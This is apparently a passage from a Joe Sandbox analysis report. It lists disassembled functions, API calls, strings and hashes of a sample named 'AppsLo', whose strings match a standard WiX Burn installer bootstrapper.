FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 008A3FC5
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 008A3FDA
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 008A4009
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 008A402B
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 008A404D
RemoveDirectoryW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 008A4064
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 008A406E
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 008A4095
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 008A40B0
FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 008A40E6

Strings

DEL, xrefs: 008A3F6D
4#v, xrefs: 008A3DF6
*.*, xrefs: 008A3E2C
dirutil.cpp, xrefs: 008A3D76, 008A3FFA

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
String ID: 4#v$*.*$DEL$dirutil.cpp
API String ID: 1544372074-4118715877
Opcode ID: 608112f25f060d32a688b41e8dd6f8678e72d1960d3f11bfba94e25a840082f7
Instruction ID: 7695f32208fea80b2e97cdaa3985e7406ceae3c4f7c6dbe9d300f13fcaa70de2
Opcode Fuzzy Hash: 608112f25f060d32a688b41e8dd6f8678e72d1960d3f11bfba94e25a840082f7
Instruction Fuzzy Hash: 55B1FA72D01639DBFB315A648C45B9AB675FF42720F0102A5FE08FB590DBB29E90DE90

Function 008A5195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 008A5217

Part of subcall function 008E04F8: InitializeCriticalSection.KERNEL32(0090B5FC,?,008A5223,00000000,?,?,?,?,?,?), ref: 008E050F

Part of subcall function 008A120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,008A523F,00000000,?), ref: 008A1248
Part of subcall function 008A120A: GetLastError.KERNEL32(?,?,?,008A523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 008A1252

CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 008A5285

Part of subcall function 008E0E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 008E0E28

GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 008A5317
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 008A5321
CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008A558E

Strings

Failed to run per-user mode., xrefs: 008A5494
Failed to initialize Wiutil., xrefs: 008A52E1
Failed to run untrusted mode., xrefs: 008A54B6
Failed to parse command line., xrefs: 008A5245
Failed to initialize Cryputil., xrefs: 008A52A6
Failed to run embedded mode., xrefs: 008A5444
3.11.1.2318, xrefs: 008A5384
Failed to initialize user state., xrefs: 008A526C
Failed to initialize Regutil., xrefs: 008A52C9
user.cpp, xrefs: 008A5345
Failed to initialize XML util., xrefs: 008A52F9
Failed to run per-machine mode., xrefs: 008A546C
Invalid run mode., xrefs: 008A53F9
Failed to get OS info., xrefs: 008A534F
Failed to initialize COM., xrefs: 008A5291
Failed to initialize core., xrefs: 008A53C3
Failed to run RunOnce mode., xrefs: 008A541C

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize user state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$user.cpp
API String ID: 3262001429-510904028
Opcode ID: e8b4200623cdb7ac1a9a875f1735e817173e7bd76d58afa8f202f05583112611
Instruction ID: 9bbc593961293bb26f60006f46c04faf611639f5fd0d48ae4ee22a198b7a78e3
Opcode Fuzzy Hash: e8b4200623cdb7ac1a9a875f1735e817173e7bd76d58afa8f202f05583112611
Instruction Fuzzy Hash: F7B1C471D41A799BEF31AA59CC46BEE76B5FF46310F0000A5F908E6641DB749EC0CE91

Function 008E304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153libraryloadercomCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,008E3609,00000000,?,00000000), ref: 008E3069
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,008CC025,?,008A5405,?,00000000,?), ref: 008E3075
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 008E30B5
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008E30C1
GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 008E30CC
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008E30D6
CoCreateInstance.OLE32(0090B6B8,00000000,00000001,008EB818,?,?,?,?,?,?,?,?,?,?,?,008CC025), ref: 008E3111
ExitProcess.KERNEL32 ref: 008E31C0

Strings

Wow64EnableWow64FsRedirection, xrefs: 008E30C3
IsWow64Process, xrefs: 008E30AF
xmlutil.cpp, xrefs: 008E3099
kernel32.dll, xrefs: 008E3059
Wow64DisableWow64FsRedirection, xrefs: 008E30BB
Wow64RevertWow64FsRedirection, xrefs: 008E30CE

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
API String ID: 2124981135-499589564
Opcode ID: c0d5d111f4817343a99e0e386ddc23be0c308ed35cde04115c0e02988f2b0e5f
Instruction ID: f5ecdf29aeab36e066c352ec9b24f5d827aa075ec04277d746313f679bb0cabc
Opcode Fuzzy Hash: c0d5d111f4817343a99e0e386ddc23be0c308ed35cde04115c0e02988f2b0e5f
Instruction Fuzzy Hash: CB41B131A01755AFDB25DBAA8849FAEB7E8FF46750F11406DF901EB280DB71DE408B90

Function 008A1070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 78fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008A33C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,008A10DD,?,00000000), ref: 008A33E8

CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 008A10F6

Part of subcall function 008A1175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,008A111A,cabinet.dll,00000009,?,?,00000000), ref: 008A1186
Part of subcall function 008A1175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,008A111A,cabinet.dll,00000009,?,?,00000000), ref: 008A1191
Part of subcall function 008A1175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008A119F
Part of subcall function 008A1175: GetLastError.KERNEL32(?,?,?,?,?,008A111A,cabinet.dll,00000009,?,?,00000000), ref: 008A11BA
Part of subcall function 008A1175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008A11C2
Part of subcall function 008A1175: GetLastError.KERNEL32(?,?,?,?,?,008A111A,cabinet.dll,00000009,?,?,00000000), ref: 008A11D7

CloseHandle.KERNELBASE(?,?,?,?,008EB4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 008A1131

Strings

clbcatq.dll, xrefs: 008A10BC
version.dll, xrefs: 008A10A7
cabinet.dll, xrefs: 008A1099, 008A1114
wininet.dll, xrefs: 008A10AE
msasn1.dll, xrefs: 008A10C3
feclient.dll, xrefs: 008A10D1
msi.dll, xrefs: 008A10A0
comres.dll, xrefs: 008A10B5
crypt32.dll, xrefs: 008A10CA

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
API String ID: 3687706282-3151496603
Opcode ID: 210805d08395f96ff6db62ff90760f578c9e62f8be52704992ac08d41d35351e
Instruction ID: 4bc50c7a680d3d26061805cdde8e593c6ffa92babb93e626b8b41c742616451f
Opcode Fuzzy Hash: 210805d08395f96ff6db62ff90760f578c9e62f8be52704992ac08d41d35351e
Instruction Fuzzy Hash: 7521807190025DABEF109FA9DC49BEFBBB8FB06714F104119FA10FB281D77099088BA5

Function 008DFE21 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(00000900,?,?,00000000,00000000,00000000,?,00000000,?,?,008E04F4,?,?,?,?,00000001), ref: 008DFE40
GetLastError.KERNEL32(?,008E04F4,?,?,?,?,00000001,?,008A5616,?,?,00000000,?,?,008A5395,00000002), ref: 008DFE4C
LocalFree.KERNEL32(00000000,?,?,00000000,?,?,008E04F4,?,?,?,?,00000001,?,008A5616,?,?), ref: 008DFEB5

Strings

logutil.cpp, xrefs: 008DFE6B

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: logutil.cpp
API String ID: 1365068426-3545173039
Opcode ID: ea56c925c648dfcbb42427f5cac85f044e0195dfed54a164a21d44240820f7bf
Instruction ID: 8a77a3275232a0184ac76eb2d64542681b64269eccfaf79d41c604b7a57ea1a9
Opcode Fuzzy Hash: ea56c925c648dfcbb42427f5cac85f044e0195dfed54a164a21d44240820f7bf
Instruction Fuzzy Hash: 1211B232600129EBDB219FC58D05EAF7B68FF54710F01412AFE06DE272D7319E20E6A1

Function 008BA0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

Failed to copy working folder., xrefs: 008BA116
Failed create working folder., xrefs: 008BA0EE
Failed to calculate working folder to ensure it exists., xrefs: 008BA0D8

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CurrentDirectoryErrorLastProcessWindows
String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
API String ID: 3841436932-2072961686
Opcode ID: 8bbe0c8167e64eec28e6fdd61941c425bb00d93800379835a8b4c974f90837f9
Instruction ID: 22a25a89f0f5ed7111f3ee8009cf983de8a582bad1d20ebd25732d4aea4fb88e
Opcode Fuzzy Hash: 8bbe0c8167e64eec28e6fdd61941c425bb00d93800379835a8b4c974f90837f9
Instruction Fuzzy Hash: CC01D832901969FA8F225B5DDC06CEFBB79FF85B20B104255F801F6310EB319E10A682

Function 008D48D8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,008D48AE,00000000,00907F08,0000000C,008D4A05,00000000,00000002,00000000), ref: 008D48F9
TerminateProcess.KERNEL32(00000000,?,008D48AE,00000000,00907F08,0000000C,008D4A05,00000000,00000002,00000000), ref: 008D4900
ExitProcess.KERNEL32 ref: 008D4912

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 403539daf8247de1fbbfd27a0830ffa6fb0354c23d01e282432f91cb81e08d03
Instruction ID: 00ec2334144778895365509ec7094676cea254f49207821f7721f142c26617d5
Opcode Fuzzy Hash: 403539daf8247de1fbbfd27a0830ffa6fb0354c23d01e282432f91cb81e08d03
Instruction Fuzzy Hash: 0DE0B631400288BBCF12AF55DD5AE4A3F69FF45791B044115F9598A232CB35ED52CB80

Function 008A394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,000001C7,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3960
RtlAllocateHeap.NTDLL(00000000,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3967

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: fa08f368a247edaa6e8a09c6670cd4feeb594543a80e9bfc720b1eeef0e0b4ad
Instruction ID: adfc325b7a928debd5ccd7ba2d257b3428d1f9470deaec7f66c3deb08c03a766
Opcode Fuzzy Hash: fa08f368a247edaa6e8a09c6670cd4feeb594543a80e9bfc720b1eeef0e0b4ad
Instruction Fuzzy Hash: 8BC012321A420EABCB006FF8EC8EC9B3BACBB286227048414B915CB120C738E0108B60

Function 008AF9E3 Relevance: 112.4, APIs: 3, Strings: 61, Instructions: 446
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to get @Comments., xrefs: 008AFCC0
Registration, xrefs: 008AF9FD
Failed to get @HelpTelephone., xrefs: 008AFC29
Failed to parse related bundles, xrefs: 008AFA83
Failed to get @DisableModify., xrefs: 008AFDB8
button, xrefs: 008AFD15
ExecutableName, xrefs: 008AFAF4
Tag, xrefs: 008AFA57
Failed to set registration paths., xrefs: 008AFF08
Failed to get @DisplayName., xrefs: 008AFB95
Failed to get @AboutUrl., xrefs: 008AFC4E
DisplayName, xrefs: 008AFB7E
Department, xrefs: 008AFE77
Publisher, xrefs: 008AFBC8
Failed to select Update node., xrefs: 008AFE3C
Failed to get @Register., xrefs: 008AFB70
Name, xrefs: 008AFEC1
DisplayVersion, xrefs: 008AFBA3
Failed to get @Version., xrefs: 008AFAA4
Arp, xrefs: 008AFB33
Invalid modify disabled type: %ls, xrefs: 008AFD94
Update, xrefs: 008AFE1E
DisableModify, xrefs: 008AFCF6
Classification, xrefs: 008AFEE2
UpdateUrl, xrefs: 008AFC5C
Failed to get @Contact., xrefs: 008AFCE8
Failed to get @HelpLink., xrefs: 008AFC04
Failed to get @ProductFamily., xrefs: 008AFEB3
DisableRemove, xrefs: 008AFDC9
Failed to get @Id., xrefs: 008AFA49
Manufacturer, xrefs: 008AFE53
Failed to parse software tag., xrefs: 008AFE10
Failed to get @Manufacturer., xrefs: 008AFE66
PerMachine, xrefs: 008AFB12
HelpLink, xrefs: 008AFBED
HelpTelephone, xrefs: 008AFC12
registration.cpp, xrefs: 008AFD87
yes, xrefs: 008AFD36
Failed to get @ParentDisplayName., xrefs: 008AFC98
Failed to get @PerMachine., xrefs: 008AFB25
Failed to select registration node., xrefs: 008AFA1C
Failed to get @UpdateUrl., xrefs: 008AFC73
Failed to parse @Version: %ls, xrefs: 008AFAC5
Failed to get @ProviderKey., xrefs: 008AFAE6
Comments, xrefs: 008AFCA9
Failed to get @DisableRemove., xrefs: 008AFDE0
Register, xrefs: 008AFB5D
AboutUrl, xrefs: 008AFC37
ParentDisplayName, xrefs: 008AFC81
Failed to select ARP node., xrefs: 008AFB4F
Failed to get @DisplayVersion., xrefs: 008AFBBA
Version, xrefs: 008AFA91
ProductFamily, xrefs: 008AFE9C
Failed to get @ExecutableName., xrefs: 008AFB07
Failed to get @Department., xrefs: 008AFE8E
Failed to get @Tag., xrefs: 008AFA6A
ProviderKey, xrefs: 008AFAD3
Failed to get @Publisher., xrefs: 008AFBDF
Contact, xrefs: 008AFCD1
Failed to get @Name., xrefs: 008AFED4
Failed to get @Classification., xrefs: 008AFEF5

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
API String ID: 760788290-2956246334
Opcode ID: 57cba0f3569cfd7f34b808a6510e5771317904f189b1c6739b90251aec81603c
Instruction ID: be671ff4f550abc421a4739b58ddc6f2bdec8d2fd0bffc16a211776c145a4630
Opcode Fuzzy Hash: 57cba0f3569cfd7f34b808a6510e5771317904f189b1c6739b90251aec81603c
Instruction Fuzzy Hash: 69E1E332E4466AFAEF1296E4CC46EBDB6A4FB13720F110231BB20F7652DB659D1096C1

Function 008AB48B Relevance: 91.6, APIs: 24, Strings: 28, Instructions: 578
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 008AB502
SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB550
GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 008AB556
ReadFile.KERNELBASE(00000000,008A4461,00000040,?,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB59E
GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 008AB5A4
SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB601
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB607
ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB650
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB656
SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB6C7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB6CD
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB716
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB71C
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB765
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB76B
SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB7B7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB7BD

Part of subcall function 008A394F: GetProcessHeap.KERNEL32(?,000001C7,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3960
Part of subcall function 008A394F: RtlAllocateHeap.NTDLL(00000000,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3967

ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB810
ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB872
SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB8FC
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 008AB906

Strings

Failed to get total size of bundle., xrefs: 008ABA23
PE Header from file didn't match PE Header in memory., xrefs: 008ABB11
Failed to read complete image section header, index: %u, xrefs: 008ABB75
Failed to allocate memory for container sizes., xrefs: 008ABAD3
Failed to find valid NT image header in buffer., xrefs: 008ABBD0
Failed to seek to section info., xrefs: 008AB6F8, 008AB934
Failed to read complete section info., xrefs: 008AB9C5
Failed to find valid DOS image header in buffer., xrefs: 008ABBEB
Failed to read signature offset., xrefs: 008AB747
Failed to read DOS header., xrefs: 008AB5CF
Failed to seek to start of file., xrefs: 008AB581
Failed to allocate buffer for section info., xrefs: 008AB8E4
section.cpp, xrefs: 008AB523, 008AB577, 008AB5C5, 008AB628, 008AB677, 008AB6EE, 008AB73D, 008AB78C, 008AB7E1, 008AB898, 008AB8D8, 008AB92A, 008AB98F, 008AB9B9, 008AB9E0, 008ABAC7, 008ABB07, 008ABB26, 008ABB63, 008ABBA1, 008ABBC4, 008ABBDF
(, xrefs: 008AB81D
Failed to seek past optional headers., xrefs: 008AB7EB
Failed to read signature size., xrefs: 008AB796
Failed to open handle to user process path., xrefs: 008AB52D
Failed to read section info, unsupported version: %08x, xrefs: 008AB9F5
Failed to read section info, data to short: %u, xrefs: 008AB8AA
Failed to read NT header., xrefs: 008AB681
burn, xrefs: 008AB838
Failed to read section info., xrefs: 008AB999
Failed to find Burn section., xrefs: 008ABB32
.wix, xrefs: 008AB830
4, xrefs: 008AB884
Failed to read image section header, index: %u, xrefs: 008ABBAC
Failed to seek to NT header., xrefs: 008AB632
PE, xrefs: 008AB698

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to user process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
API String ID: 3411815225-695169583
Opcode ID: cad369a655e3ac7af465a9109701ffaad3f46acd117c6aa3385e6ecf64f646ff
Instruction ID: d4e4b5641896113f43c0505c0ef2c1e5b1a8fba3dd75ddd3f20ba86bf7c142bd
Opcode Fuzzy Hash: cad369a655e3ac7af465a9109701ffaad3f46acd117c6aa3385e6ecf64f646ff
Instruction Fuzzy Hash: E212D672940276ABEB309A558C46FAB7AA4FF07720F0141A5FD14FB682E7749D40CBE1

Function 008C0D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32(?,?,?,?,?,008C08BC,?,?), ref: 008C0D25
